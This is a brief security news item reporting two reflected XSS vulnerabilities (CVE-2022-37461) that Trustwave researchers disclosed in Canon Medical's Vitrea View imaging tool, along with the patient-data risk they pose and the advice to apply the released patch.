"XSS Flaw in Prevalent Media Imaging Tool Exposes Trove of Patient Data"

Canon Medical's Vitrea View is a widely used tool for securely sharing medical images between radiologists, physicians, and other healthcare providers on a patient care team.  Researchers at Trustwave's SpiderLabs have recently discovered two vulnerabilities (collectively tracked as CVE-2022-37461) that could allow threat actors to access much more than X-rays.  One flaw is an unauthenticated reflected cross-site scripting (XSS) in an error message.  The second flaw is a separate Reflected XSS in the Vitrea View admin panel.  The researchers noted that if exploited, these vulnerabilities could be used to retrieve patient information, stored images, or scans, and modify information, depending on privileges used during the session.  The researchers also stated that sensitive information and credentials for various services integrated with Vitrea View could be accessed, as well.  The XSS medical imaging vulnerabilities were submitted to Canon Medial, and a patch has been released.  The researchers recommend that organizations running the tool should apply the patch immediately. 

Dark Reading reports: "XSS Flaw in Prevalent Media Imaging Tool Exposes Trove of Patient Data"